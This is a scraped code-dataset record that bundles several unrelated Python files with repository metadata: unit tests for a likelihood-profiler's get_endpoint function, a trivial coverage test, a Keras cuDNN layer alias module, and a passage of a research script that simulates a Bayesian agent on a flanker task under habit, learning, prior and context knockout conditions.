fd73c1cd24ae66f2be89833ab3f6c9c7bae68a72
|
[
"MIT"
] | 2
|
2021-01-19T08:42:36.000Z
|
2021-01-20T09:23:22.000Z
|
likelihoodprofiler/tests/test_get_endpoint.py
|
vetedde/lhp.py
|
fd73c1cd24ae66f2be89833ab3f6c9c7bae68a72
|
[
"MIT"
] | 8
|
2019-12-26T17:31:28.000Z
|
2022-03-21T22:17:42.000Z
|
likelihoodprofiler/tests/test_get_endpoint.py
|
vetedde/lhp.py
|
fd73c1cd24ae66f2be89833ab3f6c9c7bae68a72
|
[
"MIT"
] | null | null | null |
from .. import get_endpoint
from .cases_func import f_3p_1im_dep
import math
import numpy as np
import unittest
# Profile-likelihood scan method passed to every get_endpoint call below.
method = "CICO_ONE_PASS"
class getEndpointTest(unittest.TestCase):
    """Tests for get_endpoint with the CICO_ONE_PASS method on f_3p_1im_dep.

    The three heavily duplicated assertion blocks of the original are
    factored into _endpoints/_check helpers; assertTrue(x == y) is replaced
    by assertEqual so failures report the actual values.
    """

    def _endpoints(self, **kwargs):
        """Run get_endpoint for each of the three parameters; extra keyword
        arguments (direction, scale, ...) are forwarded."""
        return [get_endpoint(
            [3., 2., 2.1],
            i,
            lambda x: f_3p_1im_dep(x),
            method,
            loss_crit=9,
            **kwargs
        ) for i in range(3)]

    def _check(self, res, direction, status, value=None):
        """Assert one endpoint result.

        When value is given, the endpoint value must match within abs_tol=1e-2
        and profile points must be present; otherwise the profile must be empty.
        """
        if value is not None:
            self.assertTrue(math.isclose(res.value, value, abs_tol=1e-2))
            self.assertTrue(len(res.profilePoints) > 0)
        else:
            self.assertEqual(len(res.profilePoints), 0)
        self.assertEqual(res.status, status)
        self.assertEqual(res.direction, direction)

    def test_default_options(self):
        res0 = self._endpoints()
        self._check(res0[0], "right", "BORDER_FOUND_BY_SCAN_TOL", value=5.0)
        self._check(res0[1], "right", "BORDER_FOUND_BY_SCAN_TOL",
                    value=2.0 + 2.0 * math.sqrt(2.))
        self._check(res0[2], "right", "SCAN_BOUND_REACHED")

    def test_left_direction(self):
        res0 = self._endpoints(direction="left")
        self._check(res0[0], "left", "BORDER_FOUND_BY_SCAN_TOL", value=1.0)
        self._check(res0[1], "left", "BORDER_FOUND_BY_SCAN_TOL",
                    value=2.0 - 2.0 * math.sqrt(2.))
        self._check(res0[2], "left", "SCAN_BOUND_REACHED")

    def test_log(self):
        res0 = self._endpoints(scale=["log", "direct", "log"])
        # The log-scaled parameter's value is compared in log10 space, exactly
        # as in the original (tolerance semantics differ from direct abs_tol).
        self.assertTrue(math.isclose(np.log10(res0[0].value), np.log10(5.), abs_tol=1e-2))
        self.assertTrue(len(res0[0].profilePoints) > 0)
        self.assertEqual(res0[0].status, "BORDER_FOUND_BY_SCAN_TOL")
        self.assertEqual(res0[0].direction, "right")
        self._check(res0[1], "right", "BORDER_FOUND_BY_SCAN_TOL",
                    value=2.0 + 2.0 * math.sqrt(2.))
        self._check(res0[2], "right", "SCAN_BOUND_REACHED")
#unittest.main(argv=['first-arg-is-ignored'], exit=False)
| 38.382716
| 93
| 0.59955
| 426
| 3,109
| 4.2277
| 0.171362
| 0.256524
| 0.1799
| 0.104942
| 0.83176
| 0.83176
| 0.83176
| 0.83176
| 0.83176
| 0.811216
| 0
| 0.059473
| 0.242843
| 3,109
| 80
| 94
| 38.8625
| 0.705607
| 0.018012
| 0
| 0.69697
| 0
| 0
| 0.088139
| 0.047182
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.045455
| false
| 0.015152
| 0.075758
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69fefac90430bb34553f633516cbda99768c8180
| 113
|
py
|
Python
|
tests/test_all.py
|
jacobtomlinson/jupyterlab_iframe
|
d4caa1bda432582186824d7faf5b8f8c4f52fbc1
|
[
"Apache-2.0"
] | null | null | null |
tests/test_all.py
|
jacobtomlinson/jupyterlab_iframe
|
d4caa1bda432582186824d7faf5b8f8c4f52fbc1
|
[
"Apache-2.0"
] | null | null | null |
tests/test_all.py
|
jacobtomlinson/jupyterlab_iframe
|
d4caa1bda432582186824d7faf5b8f8c4f52fbc1
|
[
"Apache-2.0"
] | null | null | null |
# for Coverage
from jupyterlab_iframe.__init__ import *
from jupyterlab_iframe.extension import *
print('test')
| 18.833333
| 41
| 0.80531
| 14
| 113
| 6.071429
| 0.714286
| 0.329412
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115044
| 113
| 5
| 42
| 22.6
| 0.85
| 0.106195
| 0
| 0
| 0
| 0
| 0.040404
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0e0724a94a27516f92a9731789959143ffb280f3
| 147
|
py
|
Python
|
keras/layers/cudnn_recurrent.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 5
|
2020-11-30T22:26:03.000Z
|
2020-12-01T22:34:25.000Z
|
keras/layers/cudnn_recurrent.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 10
|
2020-12-01T22:55:29.000Z
|
2020-12-11T18:31:46.000Z
|
keras/layers/cudnn_recurrent.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 15
|
2020-11-30T22:12:22.000Z
|
2020-12-09T01:32:48.000Z
|
"""Recurrent layers backed by cuDNN."""
from tensorflow.keras.layers import GRU as CuDNNGRU
from tensorflow.keras.layers import LSTM as CuDNNLSTM
| 29.4
| 53
| 0.802721
| 21
| 147
| 5.619048
| 0.666667
| 0.237288
| 0.322034
| 0.423729
| 0.525424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 147
| 4
| 54
| 36.75
| 0.914729
| 0.22449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0e0bf588443d83048b5978f1011b07f114bf059c
| 53,758
|
py
|
Python
|
run_example_flanker.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
run_example_flanker.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
run_example_flanker.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 14 15:33:22 2021
@author: sarah
"""
import numpy as np
from misc import *
import world
import environment as env
import agent as agt
import perception as prc
import action_selection as asl
import itertools
import matplotlib.pylab as plt
from matplotlib.animation import FuncAnimation
from multiprocessing import Pool
from matplotlib.colors import LinearSegmentedColormap
import jsonpickle as pickle
import jsonpickle.ext.numpy as jsonpickle_numpy
import json
import seaborn as sns
import pandas as pd
import os
import scipy as sc
import scipy.signal as ss
import bottleneck as bn
import gc
np.set_printoptions(threshold = 100000, precision = 5)
"""
run function
"""
def run_agent(par_list, trials, T, ns, na, nr, nc, f, contexts, states, flankers, \
              state_trans=None, correct_choice=None, congruent=None, pol_lambda=0, \
              r_lambda=0, learn_habit=True):
    """Set up environment, perception, and planner for one flanker run and simulate it.

    Parameters
    ----------
    par_list : sequence
        (learn_pol, trans_prob, Rho, utility, unc) — unpacked below.
    trials, T : int
        Number of trials and number of time steps per trial.
    ns, na, nr, nc : int
        Numbers of states, actions, rewards, and contexts.
    f : float
        Factor passed to the Dirichlet action selector.
    contexts, states, flankers
        Trial-wise context/state/flanker sequences (presumably from
        flanker_timeseries — confirm against callers).
    state_trans : ndarray or None
        Generative state-transition matrix; a deterministic default is built
        when None.
    correct_choice, congruent : arrays or None
        Per-trial labels forwarded to the environment.
    pol_lambda, r_lambda : float
        Forgetting/decay rates for policy and reward learning.
    learn_habit : bool
        Whether the agent updates its policy prior (habit learning).

    Returns
    -------
    world.World
        The simulated world holding environment, agent, and recorded data.
    """
    #set parameters:
    #learn_pol: initial concentration parameter for policy prior
    #trans_prob: reward probability
    #avg: True for average action selection, False for maximum selection
    #Rho: Environment's reward generation probabilities as a function of time
    #utility: goal prior, preference p(o)
    learn_pol, trans_prob, Rho, utility, unc = par_list

    """
    create matrices
    """

    #generating probability of observations in each state
    # identity: observations deterministically reflect the hidden state
    A = np.eye(ns)

    #state transition generative probability (matrix)
    if state_trans is None:
        # default: action i leads to state i+1 from any current state
        B = np.zeros((ns, ns, na))
        for i in range(0,na):
            B[i+1,:,i] += 1
    else:
        B = state_trans.copy()

    # agent's beliefs about reward generation
    # concentration parameters
    C_alphas = np.ones((nr, ns, nc))
    # initialize state in front of levers so that agent knows it yields no reward
    # NOTE(review): broadcasting [100,1] over the reward axis assumes nr == 2
    C_alphas[:,:4,:] = np.array([100,1])[:,None,None]
    # C_alphas[:,4:,1] = np.array([[100, 1],
    #                              [1, 100]])
    # C_alphas[:,4:,0] = np.array([[1, 100],
    #                              [100, 1]])
    # C_alphas[:,4,:] = np.array([learn_pol,1])[None,:,None]
    # C_alphas[:,5,:] = np.array([1,learn_pol])[None,:,None]

    # agent's initial estimate of reward generation probability
    # (normalize the concentration parameters per state and context)
    C_agent = np.zeros((nr, ns, nc))
    for c in range(nc):
        C_agent[:,:,c] = np.array([(C_alphas[:,i,c])/(C_alphas[:,i,c]).sum() for i in range(ns)]).T

    # context transition matrix: stay with prob p, switch uniformly otherwise
    if nc>1:
        p = trans_prob
        q = 1.-p
        transition_matrix_context = np.zeros((nc, nc))
        transition_matrix_context += q/(nc-1)
        for i in range(nc):
            transition_matrix_context[i,i] = p
    else:
        transition_matrix_context = np.array([[1]])

    # context observation matrix (environment side)
    # NOTE(review): hard-coded 2x2 here while the agent's D below uses nc —
    # presumably the environment always has two contexts; confirm.
    D = np.zeros((2,2)) + unc
    for c in range(2):
        D[c,c] = 1-(unc*(2-1))

    # context observation matrix as believed by the agent
    if nc > 1:
        # D = np.zeros((nc,nc)) + unc
        # for c in range(nc):
        #     D[c,c] = 1-(unc*(nc-1))
        D_agent = np.zeros((nc,nc)) + unc
        for c in range(nc):
            D_agent[c,c] = 1-(unc*(nc-1))
    else:
        D_agent = np.array([[1]])

    """
    create environment (grid world)
    """
    environment = env.Flanker(A, B, Rho, D, states, contexts, flankers, \
                              trials = trials, T = T,\
                              correct_choice=correct_choice, \
                              congruent=congruent)

    """
    create policies
    """
    # all action sequences of length T-1
    pol = np.array(list(itertools.product(list(range(na)), repeat=T-1)))
    npi = pol.shape[0]

    # concentration parameters of the policy prior (habit strength)
    # NOTE(review): the two-element assignments below assume npi == 2 — confirm
    alphas = np.zeros((npi, nc)) + learn_pol
    alphas[:,0] = [learn_pol,1]#[10*learn_pol,learn_pol]
    if nc>1:
        alphas[:,1] = [1,learn_pol]#[learn_pol,10*learn_pol]
    prior_pi = alphas / alphas.sum(axis=0)

    """
    set state prior (where agent thinks it starts)
    """
    # uniform over the four possible start states
    state_prior = np.zeros((ns))
    state_prior[:4] = 1./4

    """
    set action selection method
    """
    ac_sel = asl.DirichletSelector(trials=trials, T=T, number_of_actions=na, factor=f, calc_dkl=False, calc_entropy=False)

    """
    set context prior
    """
    if nc > 1:
        prior_context = np.zeros((nc)) + 1./nc #0.1/(nc-1)
        #prior_context[0] = 0.9
    else:
        prior_context = np.array([1])

    """
    set up agent
    """
    # perception
    bayes_prc = prc.HierarchicalPerception(A, B, C_agent, transition_matrix_context,
                                           state_prior, utility, prior_pi, alphas,
                                           C_alphas, T=T, generative_model_context=D_agent,
                                           pol_lambda=pol_lambda, r_lambda=r_lambda,
                                           non_decaying=4)
    # agent
    bayes_pln = agt.BayesianPlanner(bayes_prc, ac_sel, pol,
                                    trials = trials, T = T,
                                    prior_states = state_prior,
                                    prior_policies = prior_pi,
                                    number_of_states = ns,
                                    prior_context = prior_context,
                                    learn_habit = learn_habit,
                                    learn_rew = True,
                                    #save_everything = True,
                                    number_of_policies = npi,
                                    number_of_rewards = nr)

    """
    create world
    """
    w = world.World(environment, bayes_pln, trials = trials, T = T)

    """
    simulate experiment
    """
    w.simulate_experiment(range(trials))

    return w
"""
set condition dependent up parameters
"""
def run_flanker_simulations(repetitions, folder):
    """Run the full flanker simulation grid and save results as json files.

    For each (tendency, trans, unc) combination a json file is written to
    `folder`; an existing file is loaded and extended until it holds
    `repetitions` simulated worlds, so interrupted runs can be resumed.
    """
    trials = 100                      # trials per simulated experiment
    T = 2                             # time steps per trial
    ns = 6                            # number of states
    na = 2                            # number of actions
    nr = 2                            # number of rewards
    nc = 2                            # number of contexts
    u = 0.99
    utility = np.array([1-u,u])       # goal prior: strongly prefer reward
    f = 3.5                           # Dirichlet action-selection factor
    pol_lambda = 0.1                  # policy forgetting rate
    r_lambda = 0                      # reward forgetting rate
    Rho = np.zeros((trials, nr, ns))  # refilled per repetition by flanker_timeseries

    for tendency in [1]:#[1,10,100,250,1000]:#[1,10,25,50,75,100, 250,1000]:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
        for trans in [90,95,99]:#[95,96,97,98,99]
            for unc in [0,0.1,0.2,0.3,0.5,0.7,1,5,10,15,20]:#[0,0.1,0.3,0.5,0.7,1,5,10]:#[0.1,1,5,10]:#[0,0.1,0.5,1,2,3,4,5,6,8,10]:
                print(tendency, trans, unc)
                # (previously used switching timeseries and diagnostic plots)
                # Rho[:], contexts, states, state_trans, correct_choice, congruent, num_in_run = \
                #     switching_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc, stable_length=5)
                # plt.figure()
                # plt.plot(Rho[:,2,2])
                # plt.plot(Rho[:,1,1])
                # plt.show()

                # encode non-zero forgetting rates in the file-name prefix
                if pol_lambda>0:
                    prefix = "alpha_"
                else:
                    prefix = ""
                if r_lambda > 0:
                    prefix += "beta_"
                else:
                    prefix += ""

                run_name = "flanker_"+prefix+"h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f"+str(f)+"_ut"+str(u)+".json"
                fname = os.path.join(folder, run_name)

                jsonpickle_numpy.register_handlers()

                # resume from an existing results file if one is present
                if run_name in os.listdir(folder):
                    with open(fname, 'r') as infile:
                        data = json.load(infile)
                    worlds = pickle.decode(data)
                    print(len(worlds))
                    num_w_old = len(worlds)
                else:
                    worlds = []
                    num_w_old = 0

                learn_pol = tendency
                # trans and unc are given in percent; convert to probabilities
                parameters = [learn_pol, trans/100., Rho, utility, unc/100.]

                for i in range(num_w_old, repetitions):
                    # draw a fresh trial sequence for every repetition
                    Rho[:], states, flankers, contexts, state_trans, correct_choice, congruent = \
                        flanker_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc)
                    worlds.append(run_agent(parameters, trials, T, ns, na, nr, nc,\
                                            f, contexts, states, flankers, \
                                            state_trans=state_trans, \
                                            correct_choice=correct_choice, \
                                            congruent=congruent, \
                                            pol_lambda = pol_lambda,\
                                            r_lambda = r_lambda))
                    w = worlds[-1]

                    # print per-repetition summary statistics
                    print("============")
                    print(w.agent.perception.generative_model_rewards[:,:,0])
                    print(w.agent.perception.generative_model_rewards[:,:,1])
                    print("===")
                    print(w.agent.prior_policies[-1])
                    choices = w.actions[:,0]
                    correct = (choices == w.environment.correct_choice).sum()
                    print("percent correct:", correct/trials)
                    correct_cong = (choices[w.environment.congruent==1] == w.environment.correct_choice[w.environment.congruent==1]).sum()
                    print("percent correct congruent:", correct_cong/(w.environment.congruent==1).sum())
                    correct_incong = (choices[w.environment.congruent==0] == w.environment.correct_choice[w.environment.congruent==0]).sum()
                    print("percent correct incongruent:", correct_incong/(w.environment.congruent==0).sum())
                    RTs = w.agent.action_selection.RT[:,0]
                    RT_cong = np.median(RTs[w.environment.congruent==1])
                    RT_incong = np.median(RTs[w.environment.congruent==0])
                    print("congruent RT:", RT_cong)
                    print("incongruent RT:", RT_incong)

                    # (optional diagnostic plots, kept for reference)
                    # plt.figure()
                    # post_pol = np.einsum('tpc,tc->tp', w.agent.posterior_policies[:,0,:,:], w.agent.posterior_context[:,0,:])
                    # like = np.einsum('tpc,tc->tp', w.agent.likelihood[:,0,:,:], w.agent.posterior_context[:,0,:])
                    # plt.plot(post_pol[:,1], '.')
                    # plt.plot(like[:,1], 'x')
                    # plt.ylim([0,1])
                    # plt.show()
                    # plt.figure()
                    # plt.plot(w.agent.action_selection.RT[:,0], '.')
                    # #plt.plot(Rho[:,2,2])
                    # #plt.plot(Rho[:,1,1])
                    # #plt.ylim([ESS*10,2000])
                    # plt.ylim([0,2000])
                    # plt.savefig("Dir_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#
                    # plt.show()
                    # plt.figure()
                    # plt.hist(w.agent.action_selection.RT[:,0])
                    # plt.savefig("uncertain_Dir_h"+str(int(learn_pol))+"_RT_hist"+str(i)+"_1000trials.svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_hist"+str(i)+".svg")#
                    # plt.show()
                    # plt.figure()
                    # plt.plot(w.agent.posterior_context[:,0,:], 'x')
                    # plt.show()

                # persist all worlds for this parameter combination
                jsonpickle_numpy.register_handlers()
                pickled = pickle.encode(worlds)
                with open(fname, 'w') as outfile:
                    json.dump(pickled, outfile)
                # release references before the next combination to limit memory
                pickled = 0
                worlds = 0
                gc.collect()
def run_learningknockout_flanker_simulations(repetitions, folder):
    """Run flanker simulations with habit learning knocked out.

    Identical to run_flanker_simulations except that run_agent is called with
    learn_habit=False and results are saved under a *_learningknockout.json
    suffix; existing files are extended up to `repetitions` worlds.
    """
    trials = 100                      # trials per simulated experiment
    T = 2                             # time steps per trial
    ns = 6                            # number of states
    na = 2                            # number of actions
    nr = 2                            # number of rewards
    nc = 2                            # number of contexts
    u = 0.99
    utility = np.array([1-u,u])       # goal prior: strongly prefer reward
    f = 3.5                           # Dirichlet action-selection factor
    pol_lambda = 0.1                  # policy forgetting rate
    r_lambda = 0                      # reward forgetting rate
    Rho = np.zeros((trials, nr, ns))  # refilled per repetition by flanker_timeseries

    for tendency in [100]:#[1,10,100,250,1000]:#[1,10,25,50,75,100, 250,1000]:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
        for trans in [90]:#[95,96,97,98,99]
            for unc in [0.2]:#[0,0.1,0.3,0.5,0.7,1,5,10]:#[0.1,1,5,10]:#[0,0.1,0.5,1,2,3,4,5,6,8,10]:
                print(tendency, trans, unc)
                # (previously used switching timeseries and diagnostic plots)
                # Rho[:], contexts, states, state_trans, correct_choice, congruent, num_in_run = \
                #     switching_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc, stable_length=5)
                # plt.figure()
                # plt.plot(Rho[:,2,2])
                # plt.plot(Rho[:,1,1])
                # plt.show()

                # encode non-zero forgetting rates in the file-name prefix
                if pol_lambda>0:
                    prefix = "alpha_"
                else:
                    prefix = ""
                if r_lambda > 0:
                    prefix += "beta_"
                else:
                    prefix += ""

                run_name = "flanker_"+prefix+"h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f"+str(f)+"_ut"+str(u)+"_learningknockout.json"
                print(run_name)
                fname = os.path.join(folder, run_name)

                jsonpickle_numpy.register_handlers()

                # resume from an existing results file if one is present
                if run_name in os.listdir(folder):
                    with open(fname, 'r') as infile:
                        data = json.load(infile)
                    worlds = pickle.decode(data)
                    print(len(worlds))
                    num_w_old = len(worlds)
                else:
                    worlds = []
                    num_w_old = 0

                learn_pol = tendency
                # trans and unc are given in percent; convert to probabilities
                parameters = [learn_pol, trans/100., Rho, utility, unc/100.]

                for i in range(num_w_old, repetitions):
                    # draw a fresh trial sequence for every repetition
                    Rho[:], states, flankers, contexts, state_trans, correct_choice, congruent = \
                        flanker_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc)
                    # learn_habit=False: the knockout under test here
                    worlds.append(run_agent(parameters, trials, T, ns, na, nr, nc,\
                                            f, contexts, states, flankers, \
                                            state_trans=state_trans, \
                                            correct_choice=correct_choice, \
                                            congruent=congruent, \
                                            pol_lambda = pol_lambda,\
                                            r_lambda = r_lambda, learn_habit=False))
                    w = worlds[-1]

                    # print per-repetition summary statistics
                    print("============")
                    print(w.agent.perception.generative_model_rewards[:,:,0])
                    print(w.agent.perception.generative_model_rewards[:,:,1])
                    print("===")
                    print(w.agent.prior_policies[-1])
                    choices = w.actions[:,0]
                    correct = (choices == w.environment.correct_choice).sum()
                    print("percent correct:", correct/trials)
                    correct_cong = (choices[w.environment.congruent==1] == w.environment.correct_choice[w.environment.congruent==1]).sum()
                    print("percent correct congruent:", correct_cong/(w.environment.congruent==1).sum())
                    correct_incong = (choices[w.environment.congruent==0] == w.environment.correct_choice[w.environment.congruent==0]).sum()
                    print("percent correct incongruent:", correct_incong/(w.environment.congruent==0).sum())
                    RTs = w.agent.action_selection.RT[:,0]
                    RT_cong = np.median(RTs[w.environment.congruent==1])
                    RT_incong = np.median(RTs[w.environment.congruent==0])
                    print("congruent RT:", RT_cong)
                    print("incongruent RT:", RT_incong)

                    # (optional diagnostic plots, kept for reference)
                    # plt.figure()
                    # post_pol = np.einsum('tpc,tc->tp', w.agent.posterior_policies[:,0,:,:], w.agent.posterior_context[:,0,:])
                    # like = np.einsum('tpc,tc->tp', w.agent.likelihood[:,0,:,:], w.agent.posterior_context[:,0,:])
                    # plt.plot(post_pol[:,1], '.')
                    # plt.plot(like[:,1], 'x')
                    # plt.ylim([0,1])
                    # plt.show()
                    # plt.figure()
                    # plt.plot(w.agent.action_selection.RT[:,0], '.')
                    # #plt.plot(Rho[:,2,2])
                    # #plt.plot(Rho[:,1,1])
                    # #plt.ylim([ESS*10,2000])
                    # plt.ylim([0,2000])
                    # plt.savefig("Dir_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#
                    # plt.show()
                    # plt.figure()
                    # plt.hist(w.agent.action_selection.RT[:,0])
                    # plt.savefig("uncertain_Dir_h"+str(int(learn_pol))+"_RT_hist"+str(i)+"_1000trials.svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_hist"+str(i)+".svg")#
                    # plt.show()
                    # plt.figure()
                    # plt.plot(w.agent.posterior_context[:,0,:], 'x')
                    # plt.show()

                # persist all worlds for this parameter combination
                jsonpickle_numpy.register_handlers()
                pickled = pickle.encode(worlds)
                with open(fname, 'w') as outfile:
                    json.dump(pickled, outfile)
                # release references before the next combination to limit memory
                pickled = 0
                worlds = 0
                gc.collect()
def run_priorknockout_flanker_simulations(repetitions, folder):
    """Run flanker simulations with the habit prior knocked out.

    Uses tendency (learn_pol) = 1, i.e. a flat initial policy prior, together
    with learn_habit=False; results are saved under a *_priorknockout.json
    suffix, with existing files extended up to `repetitions` worlds.
    """
    trials = 100                      # trials per simulated experiment
    T = 2                             # time steps per trial
    ns = 6                            # number of states
    na = 2                            # number of actions
    nr = 2                            # number of rewards
    nc = 2                            # number of contexts
    u = 0.99
    utility = np.array([1-u,u])       # goal prior: strongly prefer reward
    f = 3.5                           # Dirichlet action-selection factor
    pol_lambda = 0.1                  # policy forgetting rate
    r_lambda = 0                      # reward forgetting rate
    Rho = np.zeros((trials, nr, ns))  # refilled per repetition by flanker_timeseries

    for tendency in [1]:#[1,10,100,250,1000]:#[1,10,25,50,75,100, 250,1000]:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
        for trans in [90]:#[95,96,97,98,99]
            for unc in [0.2]:#[0,0.1,0.3,0.5,0.7,1,5,10]:#[0.1,1,5,10]:#[0,0.1,0.5,1,2,3,4,5,6,8,10]:
                print(tendency, trans, unc)
                # (previously used switching timeseries and diagnostic plots)
                # Rho[:], contexts, states, state_trans, correct_choice, congruent, num_in_run = \
                #     switching_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc, stable_length=5)
                # plt.figure()
                # plt.plot(Rho[:,2,2])
                # plt.plot(Rho[:,1,1])
                # plt.show()

                # encode non-zero forgetting rates in the file-name prefix
                if pol_lambda>0:
                    prefix = "alpha_"
                else:
                    prefix = ""
                if r_lambda > 0:
                    prefix += "beta_"
                else:
                    prefix += ""

                run_name = "flanker_"+prefix+"h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f"+str(f)+"_ut"+str(u)+"_priorknockout.json"
                fname = os.path.join(folder, run_name)
                print(fname)

                jsonpickle_numpy.register_handlers()

                # resume from an existing results file if one is present
                if run_name in os.listdir(folder):
                    with open(fname, 'r') as infile:
                        data = json.load(infile)
                    worlds = pickle.decode(data)
                    print(len(worlds))
                    num_w_old = len(worlds)
                else:
                    worlds = []
                    num_w_old = 0

                learn_pol = tendency
                # trans and unc are given in percent; convert to probabilities
                parameters = [learn_pol, trans/100., Rho, utility, unc/100.]

                for i in range(num_w_old, repetitions):
                    # draw a fresh trial sequence for every repetition
                    Rho[:], states, flankers, contexts, state_trans, correct_choice, congruent = \
                        flanker_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc)
                    worlds.append(run_agent(parameters, trials, T, ns, na, nr, nc,\
                                            f, contexts, states, flankers, \
                                            state_trans=state_trans, \
                                            correct_choice=correct_choice, \
                                            congruent=congruent, \
                                            pol_lambda = pol_lambda,\
                                            r_lambda = r_lambda, learn_habit=False))
                    w = worlds[-1]

                    # print per-repetition summary statistics
                    print("============")
                    print(w.agent.perception.generative_model_rewards[:,:,0])
                    print(w.agent.perception.generative_model_rewards[:,:,1])
                    print("===")
                    print(w.agent.prior_policies[-1])
                    choices = w.actions[:,0]
                    correct = (choices == w.environment.correct_choice).sum()
                    print("percent correct:", correct/trials)
                    correct_cong = (choices[w.environment.congruent==1] == w.environment.correct_choice[w.environment.congruent==1]).sum()
                    print("percent correct congruent:", correct_cong/(w.environment.congruent==1).sum())
                    correct_incong = (choices[w.environment.congruent==0] == w.environment.correct_choice[w.environment.congruent==0]).sum()
                    print("percent correct incongruent:", correct_incong/(w.environment.congruent==0).sum())
                    RTs = w.agent.action_selection.RT[:,0]
                    RT_cong = np.median(RTs[w.environment.congruent==1])
                    RT_incong = np.median(RTs[w.environment.congruent==0])
                    print("congruent RT:", RT_cong)
                    print("incongruent RT:", RT_incong)

                    # (optional diagnostic plots, kept for reference)
                    # plt.figure()
                    # post_pol = np.einsum('tpc,tc->tp', w.agent.posterior_policies[:,0,:,:], w.agent.posterior_context[:,0,:])
                    # like = np.einsum('tpc,tc->tp', w.agent.likelihood[:,0,:,:], w.agent.posterior_context[:,0,:])
                    # plt.plot(post_pol[:,1], '.')
                    # plt.plot(like[:,1], 'x')
                    # plt.ylim([0,1])
                    # plt.show()
                    # plt.figure()
                    # plt.plot(w.agent.action_selection.RT[:,0], '.')
                    # #plt.plot(Rho[:,2,2])
                    # #plt.plot(Rho[:,1,1])
                    # #plt.ylim([ESS*10,2000])
                    # plt.ylim([0,2000])
                    # plt.savefig("Dir_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#
                    # plt.show()
                    # plt.figure()
                    # plt.hist(w.agent.action_selection.RT[:,0])
                    # plt.savefig("uncertain_Dir_h"+str(int(learn_pol))+"_RT_hist"+str(i)+"_1000trials.svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_hist"+str(i)+".svg")#
                    # plt.show()
                    # plt.figure()
                    # plt.plot(w.agent.posterior_context[:,0,:], 'x')
                    # plt.show()

                # persist all worlds for this parameter combination
                jsonpickle_numpy.register_handlers()
                pickled = pickle.encode(worlds)
                with open(fname, 'w') as outfile:
                    json.dump(pickled, outfile)
                # release references before the next combination to limit memory
                pickled = 0
                worlds = 0
                gc.collect()
def run_contextknockout_flanker_simulations(repetitions, folder):
    """Run flanker simulations with context inference knocked out.

    run_agent is called with nc=1 (a single context, so no context inference)
    and learn_habit=False; results are saved under a *_contextknockout.json
    suffix, with existing files extended up to `repetitions` worlds.
    """
    trials = 100                      # trials per simulated experiment
    T = 2                             # time steps per trial
    ns = 6                            # number of states
    na = 2                            # number of actions
    nr = 2                            # number of rewards
    nc = 2                            # contexts in the generated timeseries (agent gets 1)
    u = 0.99
    utility = np.array([1-u,u])       # goal prior: strongly prefer reward
    f = 3.5                           # Dirichlet action-selection factor
    pol_lambda = 0.1                  # policy forgetting rate
    r_lambda = 0                      # reward forgetting rate
    Rho = np.zeros((trials, nr, ns))  # refilled per repetition by flanker_timeseries

